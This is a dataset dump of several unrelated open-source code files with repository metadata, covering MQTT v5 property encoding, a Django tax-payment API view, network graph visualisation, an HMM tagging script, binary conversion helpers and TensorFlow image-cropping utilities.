Used\n in several places in MQTT v5.0 properties.\n\n \"\"\"\n\n @staticmethod\n def encode(x):\n \"\"\"\n Convert an integer 0 <= x <= 268435455 into multi-byte format.\n Returns the buffer convered from the integer.\n \"\"\"\n assert 0 <= x <= 268435455\n buffer = b''\n while 1:\n digit = x % 128\n x //= 128\n if x > 0:\n digit |= 0x80\n if sys.version_info[0] >= 3:\n buffer += bytes([digit])\n else:\n buffer += bytes(chr(digit))\n if x == 0:\n break\n return buffer\n\n @staticmethod\n def decode(buffer):\n \"\"\"\n Get the value of a multi-byte integer from a buffer\n Return the value, and the number of bytes used.\n\n [MQTT-1.5.5-1] the encoded value MUST use the minimum number of bytes necessary to represent the value\n \"\"\"\n multiplier = 1\n value = 0\n bytes = 0\n while 1:\n bytes += 1\n digit = buffer[0]\n buffer = buffer[1:]\n value += (digit & 127) * multiplier\n if digit & 128 == 0:\n break\n multiplier *= 128\n return (value, bytes)\n\n\nclass Properties(object):\n \"\"\"MQTT v5.0 properties class.\n\n See Properties.names for a list of accepted property names along with their numeric values.\n\n See Properties.properties for the data type of each property.\n\n Example of use:\n\n publish_properties = Properties(PacketTypes.PUBLISH)\n publish_properties.UserProperty = (\"a\", \"2\")\n publish_properties.UserProperty = (\"c\", \"3\")\n\n First the object is created with packet type as argument, no properties will be present at\n this point. Then properties are added as attributes, the name of which is the string property\n name without the spaces.\n\n \"\"\"\n\n def __init__(self, packetType):\n self.packetType = packetType\n self.types = [\"Byte\", \"Two Byte Integer\", \"Four Byte Integer\", \"Variable Byte Integer\",\n \"Binary Data\", \"UTF-8 Encoded String\", \"UTF-8 String Pair\"]\n\n self.names = {\n \"Payload Format Indicator\": 1,\n \"Message Expiry Interval\": 2,\n \"Content Type\": 3,\n \"Response Topic\": 8,\n \"Correlation Data\": 9,\n \"Subscription Identifier\": 11,\n \"Session Expiry Interval\": 17,\n \"Assigned Client Identifier\": 18,\n \"Server Keep Alive\": 19,\n \"Authentication Method\": 21,\n \"Authentication Data\": 22,\n \"Request Problem Information\": 23,\n \"Will Delay Interval\": 24,\n \"Request Response Information\": 25,\n \"Response Information\": 26,\n \"Server Reference\": 28,\n \"Reason String\": 31,\n \"Receive Maximum\": 33,\n \"Topic Alias Maximum\": 34,\n \"Topic Alias\": 35,\n \"Maximum QoS\": 36,\n \"Retain Available\": 37,\n \"User Property\": 38,\n \"Maximum Packet Size\": 39,\n \"Wildcard Subscription Available\": 40,\n \"Subscription Identifier Available\": 41,\n \"Shared Subscription Available\": 42\n }\n\n self.properties = {\n # id: type, packets\n # payload format indicator\n 1: (self.types.index(\"Byte\"), [PacketTypes.PUBLISH, PacketTypes.WILLMESSAGE]),\n 2: (self.types.index(\"Four Byte Integer\"), [PacketTypes.PUBLISH, PacketTypes.WILLMESSAGE]),\n 3: (self.types.index(\"UTF-8 Encoded String\"), [PacketTypes.PUBLISH, PacketTypes.WILLMESSAGE]),\n 8: (self.types.index(\"UTF-8 Encoded String\"), [PacketTypes.PUBLISH, PacketTypes.WILLMESSAGE]),\n 9: (self.types.index(\"Binary Data\"), [PacketTypes.PUBLISH, PacketTypes.WILLMESSAGE]),\n 11: (self.types.index(\"Variable Byte Integer\"),\n [PacketTypes.PUBLISH, PacketTypes.SUBSCRIBE]),\n 17: (self.types.index(\"Four Byte Integer\"),\n [PacketTypes.CONNECT, PacketTypes.CONNACK, PacketTypes.DISCONNECT]),\n 18: (self.types.index(\"UTF-8 Encoded String\"), [PacketTypes.CONNACK]),\n 19: 
(self.types.index(\"Two Byte Integer\"), [PacketTypes.CONNACK]),\n 21: (self.types.index(\"UTF-8 Encoded String\"),\n [PacketTypes.CONNECT, PacketTypes.CONNACK, PacketTypes.AUTH]),\n 22: (self.types.index(\"Binary Data\"),\n [PacketTypes.CONNECT, PacketTypes.CONNACK, PacketTypes.AUTH]),\n 23: (self.types.index(\"Byte\"),\n [PacketTypes.CONNECT]),\n 24: (self.types.index(\"Four Byte Integer\"), [PacketTypes.WILLMESSAGE]),\n 25: (self.types.index(\"Byte\"), [PacketTypes.CONNECT]),\n 26: (self.types.index(\"UTF-8 Encoded String\"), [PacketTypes.CONNACK]),\n 28: (self.types.index(\"UTF-8 Encoded String\"),\n [PacketTypes.CONNACK, PacketTypes.DISCONNECT]),\n 31: (self.types.index(\"UTF-8 Encoded String\"),\n [PacketTypes.CONNACK, PacketTypes.PUBACK, PacketTypes.PUBREC,\n PacketTypes.PUBREL, PacketTypes.PUBCOMP, PacketTypes.SUBACK,\n PacketTypes.UNSUBACK, PacketTypes.DISCONNECT, PacketTypes.AUTH]),\n 33: (self.types.index(\"Two Byte Integer\"),\n [PacketTypes.CONNECT, PacketTypes.CONNACK]),\n 34: (self.types.index(\"Two Byte Integer\"),\n [PacketTypes.CONNECT, PacketTypes.CONNACK]),\n 35: (self.types.index(\"Two Byte Integer\"), [PacketTypes.PUBLISH]),\n 36: (self.types.index(\"Byte\"), [PacketTypes.CONNACK]),\n 37: (self.types.index(\"Byte\"), [PacketTypes.CONNACK]),\n 38: (self.types.index(\"UTF-8 String Pair\"),\n [PacketTypes.CONNECT, PacketTypes.CONNACK,\n PacketTypes.PUBLISH, PacketTypes.PUBACK,\n PacketTypes.PUBREC, PacketTypes.PUBREL, PacketTypes.PUBCOMP,\n PacketTypes.SUBSCRIBE, PacketTypes.SUBACK,\n PacketTypes.UNSUBSCRIBE, PacketTypes.UNSUBACK,\n PacketTypes.DISCONNECT, PacketTypes.AUTH, PacketTypes.WILLMESSAGE]),\n 39: (self.types.index(\"Four Byte Integer\"),\n [PacketTypes.CONNECT, PacketTypes.CONNACK]),\n 40: (self.types.index(\"Byte\"), [PacketTypes.CONNACK]),\n 41: (self.types.index(\"Byte\"), [PacketTypes.CONNACK]),\n 42: (self.types.index(\"Byte\"), [PacketTypes.CONNACK]),\n }\n\n def allowsMultiple(self, compressedName):\n return self.getIdentFromName(compressedName) in [11, 38]\n\n def getIdentFromName(self, compressedName):\n # return the identifier corresponding to the property name\n result = -1\n for name in self.names.keys():\n if compressedName == name.replace(' ', ''):\n result = self.names[name]\n break\n return result\n\n def __setattr__(self, name, value):\n name = name.replace(' ', '')\n privateVars = [\"packetType\", \"types\", \"names\", \"properties\"]\n if name in privateVars:\n object.__setattr__(self, name, value)\n else:\n # the name could have spaces in, or not. 
Remove spaces before assignment\n if name not in [aname.replace(' ', '') for aname in self.names.keys()]:\n raise MQTTException(\n \"Property name must be one of \"+str(self.names.keys()))\n # check that this attribute applies to the packet type\n if self.packetType not in self.properties[self.getIdentFromName(name)][1]:\n raise MQTTException(\"Property %s does not apply to packet type %s\"\n % (name, PacketTypes.Names[self.packetType]))\n\n # Check for forbidden values\n if type(value) != type([]):\n if name in [\"ReceiveMaximum\", \"TopicAlias\"] \\\n and (value < 1 or value > 65535):\n\n raise MQTTException(\n \"%s property value must be in the range 1-65535\" % (name))\n elif name in [\"TopicAliasMaximum\"] \\\n and (value < 0 or value > 65535):\n\n raise MQTTException(\n \"%s property value must be in the range 0-65535\" % (name))\n elif name in [\"MaximumPacketSize\", \"SubscriptionIdentifier\"] \\\n and (value < 1 or value > 268435455):\n\n raise MQTTException(\n \"%s property value must be in the range 1-268435455\" % (name))\n elif name in [\"RequestResponseInformation\", \"RequestProblemInformation\", \"PayloadFormatIndicator\"] \\\n and (value != 0 and value != 1):\n\n raise MQTTException(\n \"%s property value must be 0 or 1\" % (name))\n\n if self.allowsMultiple(name):\n if type(value) != type([]):\n value = [value]\n if hasattr(self, name):\n value = object.__getattribute__(self, name) + value\n object.__setattr__(self, name, value)\n\n def __str__(self):\n buffer = \"[\"\n first = True\n for name in self.names.keys():\n compressedName = name.replace(' ', '')\n if hasattr(self, compressedName):\n if not first:\n buffer += \", \"\n buffer += compressedName + \" : \" + \\\n str(getattr(self, compressedName))\n first = False\n buffer += \"]\"\n return buffer\n\n def json(self):\n data = {}\n for name in self.names.keys():\n compressedName = name.replace(' ', '')\n if hasattr(self, compressedName):\n val = getattr(self, compressedName)\n if compressedName == 'CorrelationData' and isinstance(val, bytes):\n data[compressedName] = val.hex()\n else:\n data[compressedName] = val\n return data\n\n def isEmpty(self):\n rc = True\n for name in self.names.keys():\n compressedName = name.replace(' ', '')\n if hasattr(self, compressedName):\n rc = False\n break\n return rc\n\n def clear(self):\n for name in self.names.keys():\n compressedName = name.replace(' ', '')\n if hasattr(self, compressedName):\n delattr(self, compressedName)\n\n def writeProperty(self, identifier, type, value):\n buffer = b\"\"\n buffer += VariableByteIntegers.encode(identifier) # identifier\n if type == self.types.index(\"Byte\"): # value\n if sys.version_info[0] < 3:\n buffer += chr(value)\n else:\n buffer += bytes([value])\n elif type == self.types.index(\"Two Byte Integer\"):\n buffer += writeInt16(value)\n elif type == self.types.index(\"Four Byte Integer\"):\n buffer += writeInt32(value)\n elif type == self.types.index(\"Variable Byte Integer\"):\n buffer += VariableByteIntegers.encode(value)\n elif type == self.types.index(\"Binary Data\"):\n buffer += writeBytes(value)\n elif type == self.types.index(\"UTF-8 Encoded String\"):\n buffer += writeUTF(value)\n elif type == self.types.index(\"UTF-8 String Pair\"):\n buffer += writeUTF(value[0]) + writeUTF(value[1])\n return buffer\n\n def pack(self):\n # serialize properties into buffer for sending over network\n buffer = b\"\"\n for name in self.names.keys():\n compressedName = name.replace(' ', '')\n if hasattr(self, compressedName):\n identifier = 
self.getIdentFromName(compressedName)\n attr_type = self.properties[identifier][0]\n if self.allowsMultiple(compressedName):\n for prop in getattr(self, compressedName):\n buffer += self.writeProperty(identifier,\n attr_type, prop)\n else:\n buffer += self.writeProperty(identifier, attr_type,\n getattr(self, compressedName))\n return VariableByteIntegers.encode(len(buffer)) + buffer\n\n def readProperty(self, buffer, type, propslen):\n if type == self.types.index(\"Byte\"):\n value = buffer[0]\n valuelen = 1\n elif type == self.types.index(\"Two Byte Integer\"):\n value = readInt16(buffer)\n valuelen = 2\n elif type == self.types.index(\"Four Byte Integer\"):\n value = readInt32(buffer)\n valuelen = 4\n elif type == self.types.index(\"Variable Byte Integer\"):\n value, valuelen = VariableByteIntegers.decode(buffer)\n elif type == self.types.index(\"Binary Data\"):\n value, valuelen = readBytes(buffer)\n elif type == self.types.index(\"UTF-8 Encoded String\"):\n value, valuelen = readUTF(buffer, propslen)\n elif type == self.types.index(\"UTF-8 String Pair\"):\n value, valuelen = readUTF(buffer, propslen)\n buffer = buffer[valuelen:] # strip the bytes used by the value\n value1, valuelen1 = readUTF(buffer, propslen - valuelen)\n value = (value, value1)\n valuelen += valuelen1\n return value, valuelen\n\n def getNameFromIdent(self, identifier):\n rc = None\n for name in self.names:\n if self.names[name] == identifier:\n rc = name\n return rc\n\n def unpack(self, buffer):\n if sys.version_info[0] < 3:\n buffer = bytearray(buffer)\n self.clear()\n # deserialize properties into attributes from buffer received from network\n propslen, VBIlen = VariableByteIntegers.decode(buffer)\n buffer = buffer[VBIlen:] # strip the bytes used by the VBI\n propslenleft = propslen\n while propslenleft > 0: # properties length is 0 if there are none\n identifier, VBIlen2 = VariableByteIntegers.decode(\n buffer) # property identifier\n buffer = buffer[VBIlen2:] # strip the bytes used by the VBI\n propslenleft -= VBIlen2\n attr_type = self.properties[identifier][0]\n value, valuelen = self.readProperty(\n buffer, attr_type, propslenleft)\n buffer = buffer[valuelen:] # strip the bytes used by the value\n propslenleft -= valuelen\n propname = self.getNameFromIdent(identifier)\n compressedName = propname.replace(' ', '')\n if not self.allowsMultiple(compressedName) and hasattr(self, compressedName):\n raise MQTTException(\n \"Property '%s' must not exist more than once\" % property)\n setattr(self, propname, value)\n return self, propslen + VBIlen\n","repo_name":"Tautulli/Tautulli","sub_path":"lib/paho/mqtt/properties.py","file_name":"properties.py","file_ext":"py","file_size_in_byte":17137,"program_lang":"python","lang":"en","doc_type":"code","stars":5119,"dataset":"github-code","pt":"99"} +{"seq_id":"3390274217","text":"from django.utils.translation import gettext as _\nfrom django.conf import settings\nfrom django.utils import timezone\n\nfrom rest_framework import status\nfrom rest_framework.response import Response\nfrom rest_framework.views import APIView\n\nfrom gdaf.utils import ni_etat_civil\nfrom apps.payments.models import NoteImpositionPaymentStatement\n\nIHELA_AGENCE_MAPPING = getattr(settings, \"IHELA_AGENCE_MAPPING\", {})\n\n\nclass DocumentTypeListAPIView(APIView):\n def get(self, request):\n etat_civil = ni_etat_civil.EtatCivilAPI(fetch_token=False)\n returned_status, returned_data = etat_civil.get_tarif()\n return Response(returned_data, status=returned_status)\n\n\nclass 
AvisImpositionAPIView(APIView):\n def get(self, request, reference):\n etat_civil = ni_etat_civil.EtatCivilAPI()\n\n returned_status, returned_data = etat_civil.get_avis_imposition_request(\n reference\n )\n return Response(returned_data, status=returned_status)\n\n\nclass AvisImpositionPayAPIView(APIView):\n def post(self, request):\n etat_civil = ni_etat_civil.EtatCivilAPI()\n request_data = self.request.data.get(\"noteimposition_data\", {})\n\n returned_data = {}\n returned_status = status.HTTP_200_OK\n\n reference = request_data.get(\"note_imposition\", None)\n nom_banque = request_data.get(\"bank_name\", None)\n code_banque = request_data.get(\"bank_code\", None)\n nom_agence = request_data.get(\"bank_branch_name\", None)\n reference_ext = request_data.get(\"bank_reference\", None)\n quantite = request_data.get(\"quantity\", None)\n code_document = request_data.get(\"doctype\", None)\n demandeur = request_data.get(\"client_name\", None)\n prix_totale = request_data.get(\"amount\", None)\n description = request_data.get(\"client_description\", None)\n identite = request_data.get(\"client_id_card_no\", None)\n bank_user = request_data.get(\"bank_user\", None)\n bank_description = request_data.get(\"bank_description\", None)\n\n # If there is no reference given, the note is created\n # Required params are code_document and quantite\n if not reference and code_document and quantite:\n new_imp_status, new_imposition = etat_civil.creation_avis_imposition_request(\n code_document, quantite, demandeur, description, identite\n )\n\n if new_imp_status != status.HTTP_200_OK:\n returned_data[\"error\"] = True\n returned_data[\"error_message\"] = _(\n \"Could not create a new document note.\"\n )\n reference = None\n else:\n reference = new_imposition.get(\"reference\")\n description = new_imposition.get(\"doctype\")\n\n print(\"ALL DATA : \", request.data)\n\n if reference and nom_banque and code_banque and nom_agence:\n returned_status, returned_data = etat_civil.pay_avis_imposition(\n reference_avis=reference,\n code_banque=code_banque,\n nom_banque=nom_banque,\n nom_agence=nom_agence,\n prix_totale=prix_totale,\n quantite=quantite,\n reference_ext=reference_ext,\n )\n\n if not returned_data.get(\"error\", True):\n NoteImpositionPaymentStatement.objects.create(\n note_imposition=reference,\n note_type=NoteImpositionPaymentStatement.ETAT_CIVIL,\n user=self.request.user,\n ref_paiement=reference_ext,\n # agence=models.Agence.objects.get(\n # code=\"15\"\n # ).pk, # TODO: Get Agence from API.\n agence=IHELA_AGENCE_MAPPING[code_banque],\n date_paiement=timezone.now(),\n montant_tranche=prix_totale,\n bank_name=nom_banque,\n bank_user=bank_user,\n bank_description=bank_description,\n )\n\n returned_data[\"description\"] = description\n\n else:\n returned_data = {\n \"error\": True,\n \"error_message\": _(\n \"Could not find a document note or create a new one.\"\n ),\n }\n return Response(returned_data, status=returned_status)\n","repo_name":"augustinbingwa/gdafgdafSysteme","sub_path":"api/payments/views/etat_civil.py","file_name":"etat_civil.py","file_ext":"py","file_size_in_byte":4411,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"31867867788","text":"import networkx as nx\nfrom pyvis.network import Network\nfrom matplotlib.colors import TABLEAU_COLORS\n\n__all__ = [\n 'tableau_colors',\n 'networkx_graph_to_pyvis_network',\n]\n\ntableau_colors = list(TABLEAU_COLORS.values())\n\n\ndef networkx_graph_to_pyvis_network(\n g: nx.Graph,\n 
node_label: str = 'label',\n node_title: str = 'title',\n node_size: str = 'size',\n node_color: str = 'color',\n edge_weight: str = 'weight',\n height: str = '100%',\n width: str = '100%',\n notebook: bool = False,\n heading: str = '',\n gravity: int = -10000,\n) -> Network:\n node_labels = nx.get_node_attributes(g, node_label)\n node_titles = nx.get_node_attributes(g, node_title)\n node_sizes = nx.get_node_attributes(g, node_size)\n node_colors = nx.get_node_attributes(g, node_color)\n edge_widths = nx.get_edge_attributes(g, edge_weight)\n\n network = Network(height=height, width=width, directed=nx.is_directed(g), notebook=notebook, heading=heading)\n\n for node in g.nodes:\n label = node_labels.get(node, node)\n title = node_titles.get(node, node)\n size = node_sizes.get(node, 10)\n color = node_colors.get(node, tableau_colors[0])\n\n network.add_node(node, label=label, title=title, size=float(size), color=color)\n\n for edge in g.edges:\n width = edge_widths.get(edge, 1)\n network.add_edge(*edge, width=float(width))\n\n network.barnes_hut(gravity=gravity)\n\n return network\n","repo_name":"ylytkin/notion-graph-view","sub_path":"src/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1497,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"19242406562","text":"from nltk.tag import hmm\nimport time\nimport load_conll\nimport numpy as np\nfrom lstm.evaluation.confusion_matrix import ConfusionMatrix\n\ndef transform_classes_to_binary(y, labels_list):\n labels_list = np.array(labels_list)\n y = np.array([np.array([np.array([1 if np.where(labels_list == label)[0] == i else 0 for i in range(0, len(labels_list))]) for label in sentence]) for sentence in y])\n return y\n\nprint(\"HMM script started\")\nstart = time.time()\nx_train_dev, y_arg_train_dev, y_rhet_train_dev, y_aspect_train_dev, y_summary_train_dev, y_citation_train_dev = load_conll.load_data_multiple(path=\"./../annotations_conll_final_splitted/train_dev/\")\nx_test, y_arg_test, y_rhet_test, y_aspect_test, y_summary_test, y_citation_test = load_conll.load_data_multiple(path=\"./../annotations_conll_final_splitted/test/\")\nprint(\"Data loaded\")\n\n# provide token-label tuples to the trainer\nxy_train_dev = [list(zip(x_sent, y_sent)) for (x_sent, y_sent) in list(zip(x_train_dev, y_citation_train_dev))]\n\n# Setup a trainer with default(None) values\n# And train with the data\ntrainer = hmm.HiddenMarkovModelTrainer()\ntagger = trainer.train_supervised(xy_train_dev)\n#x_test = [list(x_sent) for x_sent in x_test]\nxy_pred = [tagger.tag(list(x_sent)) for x_sent in x_test]\n#xy_prd = tagger.tag(x_test)\ny_pred = [[y_token for x_token, y_token in sentence] for sentence in xy_pred]\n\nlabels = list(set([lab for sublist in y_citation_train_dev for lab in sublist]))\ny_citation_test = transform_classes_to_binary(y_citation_test, labels)\ny_pred = transform_classes_to_binary(y_pred, labels)\n\nconfusion_matrix = ConfusionMatrix(labels=labels, gold=y_citation_test, predictions=y_pred, token_level=True, one_hot_encoding=True)\nconfusion_matrix.compute_all_scores(exclude_class=\"NONE\\n\")\nprint(str(confusion_matrix.get_all_results()))\n\nprint(\"Total training time: \" + str(time.time() - start))\n\n","repo_name":"anlausch/multitask_sciarg","sub_path":"baselines/hmm.py","file_name":"hmm.py","file_ext":"py","file_size_in_byte":1877,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"99"} 
+{"seq_id":"73456519046","text":"#\nimport copy\nimport itertools\n\n\n# 计算出4个数所有的排列\ndef calculate_list(nums,length=4):\n origin_list = list(set(itertools.permutations(nums, length)))\n return origin_list\n\n\n# 计算任意2个数,四则运算的结果\ndef arithmetic(num1, num2):\n list = [num1 + num2, num1 - num2, num1 * num2, num1 / num2]\n return list\n\n\ndef rebuild_list(origin_list_part):\n for cell in set(itertools.combinations(origin_list_part, 2)): # 计算两个数的组合\n answer=[]\n answer=arithmetic(cell[0], cell[1])\n list = copy.deepcopy(origin_list_part)\n list.remove(cell[0])\n list.remove(cell[1])\n list=list(set(itertools.product(list,answer)))\n return list\n\nif __name__ == \"__main__\":\n nums=list(map(int,input().split()))\n origin_list=calculate_list(nums)\n for origin_list_part in origin_list:\n print(rebuild_list(origin_list_part))\n\n","repo_name":"yzl-eng/StudySpace","sub_path":"Notebook/Python/Python算法/示例代码/枚举算法思想/破解24点游戏.py","file_name":"破解24点游戏.py","file_ext":"py","file_size_in_byte":934,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"45717295097","text":"def dec_to_bin(n: int) -> str:\n \"\"\"Перевод в двоичную систему исчисления из десятичной.\"\"\"\n s = ''\n while n != 0:\n s += str(n % 2)\n n //= 2\n s = s[:]\n return s\n\n\ndef bin_to_dec(s: str) -> int:\n \"\"\"Перевод из двоичной системы в десятичную.\"\"\"\n n = 0\n for num, symbol in enumerate(s):\n n += int(symbol)*2**(len(s)-num - 1)\n return n\n\n\ndef solve_contest_task():\n \"\"\"Решение задачи из контеста с применением операции XOR.\"\"\"\n result = 0\n for elem in input():\n result = result ^ ord(elem)\n for elem in input():\n result = result ^ ord(elem)\n print(chr(result))\n","repo_name":"alexey87100/algo_1","sub_path":"xor.py","file_name":"xor.py","file_ext":"py","file_size_in_byte":755,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"31653213852","text":"import tensorflow.compat.v1 as tf\n\n\ndef pad_to_bounding_box(image, offset_height, offset_width, target_height,\n target_width, pad_value):\n \"\"\"Pads the given image with the given pad_value.\n\n Works like tf.image.pad_to_bounding_box, except it can pad the image\n with any given arbitrary pad value and also handle images whose sizes are not\n known during graph construction.\n Args:\n image: 3-D tensor with shape [height, width, channels]\n offset_height: Number of rows of zeros to add on top.\n offset_width: Number of columns of zeros to add on the left.\n target_height: Height of output image.\n target_width: Width of output image.\n pad_value: Value to pad the image tensor with.\n\n Returns:\n 3-D tensor of shape [target_height, target_width, channels].\n Raises:\n ValueError: If the shape of image is incompatible with the offset_* or\n target_* arguments.\n \"\"\"\n image_rank = tf.rank(image)\n image_rank_assert = tf.Assert(\n tf.equal(image_rank, 3),\n ['Wrong image tensor rank [Expected] [Actual]', 3, image_rank])\n with tf.control_dependencies([image_rank_assert]):\n image -= pad_value\n image_shape = tf.shape(image)\n height, width = image_shape[0], image_shape[1]\n target_width_assert = tf.Assert(\n tf.greater_equal(target_width, width), ['target_width must be >= width'])\n target_height_assert = tf.Assert(\n tf.greater_equal(target_height, height),\n ['target_height must be >= height'])\n with tf.control_dependencies([target_width_assert]):\n after_padding_width = target_width - offset_width - width\n with 
tf.control_dependencies([target_height_assert]):\n after_padding_height = target_height - offset_height - height\n offset_assert = tf.Assert(\n tf.logical_and(\n tf.greater_equal(after_padding_width, 0),\n tf.greater_equal(after_padding_height, 0)),\n ['target size not possible with the given target offsets'])\n\n height_params = tf.stack([offset_height, after_padding_height])\n width_params = tf.stack([offset_width, after_padding_width])\n channel_params = tf.stack([0, 0])\n with tf.control_dependencies([offset_assert]):\n paddings = tf.stack([height_params, width_params, channel_params])\n padded = tf.pad(image, paddings)\n return padded + pad_value\n\n\ndef _crop(image, offset_height, offset_width, crop_height, crop_width):\n \"\"\"Crops the given image using the provided offsets and sizes.\n\n Note that the method doesn't assume we know the input image size but it does\n assume we know the input image rank.\n Args:\n image: an image of shape [height, width, channels].\n offset_height: a scalar tensor indicating the height offset.\n offset_width: a scalar tensor indicating the width offset.\n crop_height: the height of the cropped image.\n crop_width: the width of the cropped image.\n\n Returns:\n The cropped (and resized) image.\n Raises:\n ValueError: if `image` doesn't have rank of 3.\n InvalidArgumentError: if the rank is not 3 or if the image dimensions are\n less than the crop size.\n \"\"\"\n original_shape = tf.shape(image)\n\n if len(image.get_shape().as_list()) != 3:\n raise ValueError('input must have rank of 3')\n original_channels = image.get_shape().as_list()[2]\n\n rank_assertion = tf.Assert(\n tf.equal(tf.rank(image), 3), ['Rank of image must be equal to 3.'])\n with tf.control_dependencies([rank_assertion]):\n cropped_shape = tf.stack([crop_height, crop_width, original_shape[2]])\n\n size_assertion = tf.Assert(\n tf.logical_and(\n tf.greater_equal(original_shape[0], crop_height),\n tf.greater_equal(original_shape[1], crop_width)),\n ['Crop size greater than the image size.'])\n\n offsets = tf.to_int32(tf.stack([offset_height, offset_width, 0]))\n\n # Use tf.slice instead of crop_to_bounding box as it accepts tensors to\n # define the crop size.\n with tf.control_dependencies([size_assertion]):\n image = tf.slice(image, offsets, cropped_shape)\n image = tf.reshape(image, cropped_shape)\n image.set_shape([crop_height, crop_width, original_channels])\n return image\n\n\ndef random_crop(image_list, crop_height, crop_width):\n \"\"\"Crops the given list of images.\n\n The function applies the same crop to each image in the list. 
This can be\n effectively applied when there are multiple image inputs of the same\n dimension such as:\n image, depths, normals = random_crop([image, depths, normals], 120, 150)\n Args:\n image_list: a list of image tensors of the same dimension but possibly\n varying channel.\n crop_height: the new height.\n crop_width: the new width.\n\n Returns:\n the image_list with cropped images.\n Raises:\n ValueError: if there are multiple image inputs provided with different size\n or the images are smaller than the crop dimensions.\n \"\"\"\n if not image_list:\n raise ValueError('Empty image_list.')\n\n # Compute the rank assertions.\n rank_assertions = []\n for i in range(len(image_list)):\n image_rank = tf.rank(image_list[i])\n rank_assert = tf.Assert(\n tf.equal(image_rank, 3), [\n 'Wrong rank for tensor %s [expected] [actual]', image_list[i].name,\n 3, image_rank\n ])\n rank_assertions.append(rank_assert)\n\n with tf.control_dependencies([rank_assertions[0]]):\n image_shape = tf.shape(image_list[0])\n image_height = image_shape[0]\n image_width = image_shape[1]\n crop_size_assert = tf.Assert(\n tf.logical_and(\n tf.greater_equal(image_height, crop_height),\n tf.greater_equal(image_width, crop_width)),\n ['Crop size greater than the image size.'])\n\n asserts = [rank_assertions[0], crop_size_assert]\n\n for i in range(1, len(image_list)):\n image = image_list[i]\n asserts.append(rank_assertions[i])\n with tf.control_dependencies([rank_assertions[i]]):\n shape = tf.shape(image)\n height = shape[0]\n width = shape[1]\n\n height_assert = tf.Assert(\n tf.equal(height, image_height), [\n 'Wrong height for tensor %s [expected][actual]', image.name, height,\n image_height\n ])\n width_assert = tf.Assert(\n tf.equal(width, image_width), [\n 'Wrong width for tensor %s [expected][actual]', image.name, width,\n image_width\n ])\n asserts.extend([height_assert, width_assert])\n\n # Create a random bounding box.\n #\n # Use tf.random_uniform and not numpy.random.rand as doing the former would\n # generate random numbers at graph eval time, unlike the latter which\n # generates random numbers at graph definition time.\n with tf.control_dependencies(asserts):\n max_offset_height = tf.reshape(image_height - crop_height + 1, [])\n max_offset_width = tf.reshape(image_width - crop_width + 1, [])\n offset_height = tf.random_uniform([],\n maxval=max_offset_height,\n dtype=tf.int32)\n offset_width = tf.random_uniform([], maxval=max_offset_width, dtype=tf.int32)\n\n return [\n _crop(image, offset_height, offset_width, crop_height, crop_width)\n for image in image_list\n ]\n\n\ndef get_random_scale(min_scale_factor, max_scale_factor, step_size):\n \"\"\"Gets a random scale value.\n\n Args:\n min_scale_factor: Minimum scale value.\n max_scale_factor: Maximum scale value.\n step_size: The step size from minimum to maximum value.\n\n Returns:\n A random scale value selected between minimum and maximum value.\n Raises:\n ValueError: min_scale_factor has unexpected value.\n \"\"\"\n if min_scale_factor < 0 or min_scale_factor > max_scale_factor:\n raise ValueError('Unexpected value of min_scale_factor.')\n\n if min_scale_factor == max_scale_factor:\n return tf.to_float(min_scale_factor)\n\n # When step_size = 0, we sample the value uniformly from [min, max).\n if step_size == 0:\n return tf.random_uniform([1],\n minval=min_scale_factor,\n maxval=max_scale_factor)\n\n # When step_size != 0, we randomly select one discrete value from [min, max].\n num_steps = int((max_scale_factor - min_scale_factor) / step_size + 1)\n 
scale_factors = tf.lin_space(min_scale_factor, max_scale_factor, num_steps)\n shuffled_scale_factors = tf.random_shuffle(scale_factors)\n return shuffled_scale_factors[0]\n\n\ndef randomly_scale_image_and_label(image, label=None, scale=1.0):\n \"\"\"Randomly scales image and label.\n\n Args:\n image: Image with shape [height, width, 3].\n label: Label with shape [height, width, 1].\n scale: The value to scale image and label.\n\n Returns:\n Scaled image and label.\n \"\"\"\n # No random scaling if scale == 1.\n if scale == 1.0:\n return image, label\n image_shape = tf.shape(image)\n new_dim = tf.to_int32(tf.to_float([image_shape[0], image_shape[1]]) * scale)\n\n # Need squeeze and expand_dims because image interpolation takes\n # 4D tensors as input.\n image = tf.squeeze(\n tf.image.resize_bilinear(\n tf.expand_dims(image, 0), new_dim, align_corners=True), [0])\n if label is not None:\n label = tf.squeeze(\n tf.image.resize_nearest_neighbor(\n tf.expand_dims(label, 0), new_dim, align_corners=True), [0])\n\n return image, label\n\n\ndef resolve_shape(tensor, rank=None, scope=None):\n \"\"\"Fully resolves the shape of a Tensor.\n\n Use as much as possible the shape components already known during graph\n creation and resolve the remaining ones during runtime.\n Args:\n tensor: Input tensor whose shape we query.\n rank: The rank of the tensor, provided that we know it.\n scope: Optional name scope.\n\n Returns:\n shape: The full shape of the tensor.\n \"\"\"\n with tf.name_scope(scope, 'resolve_shape', [tensor]):\n if rank is not None:\n shape = tensor.get_shape().with_rank(rank).as_list()\n else:\n shape = tensor.get_shape().as_list()\n\n if None in shape:\n shape_dynamic = tf.shape(tensor)\n for i in range(len(shape)):\n if shape[i] is None:\n shape[i] = shape_dynamic[i]\n\n return shape\n\n\ndef resize_to_range(image,\n label=None,\n min_size=None,\n max_size=None,\n factor=None,\n align_corners=True,\n label_layout_is_chw=False,\n scope=None,\n method=tf.image.ResizeMethod.BILINEAR):\n \"\"\"Resizes image or label so their sides are within the provided range.\n\n The output size can be described by two cases:\n 1. If the image can be rescaled so its minimum size is equal to min_size\n without the other side exceeding max_size, then do so.\n 2. Otherwise, resize so the largest side is equal to max_size.\n An integer in `range(factor)` is added to the computed sides so that the\n final dimensions are multiples of `factor` plus one.\n Args:\n image: A 3D tensor of shape [height, width, channels].\n label: (optional) A 3D tensor of shape [height, width, channels] (default)\n or [channels, height, width] when label_layout_is_chw = True.\n min_size: (scalar) desired size of the smaller image side.\n max_size: (scalar) maximum allowed size of the larger image side. Note that\n the output dimension is no larger than max_size and may be slightly\n smaller than min_size when factor is not None.\n factor: Make output size multiple of factor plus one.\n align_corners: If True, exactly align all 4 corners of input and output.\n label_layout_is_chw: If true, the label has shape 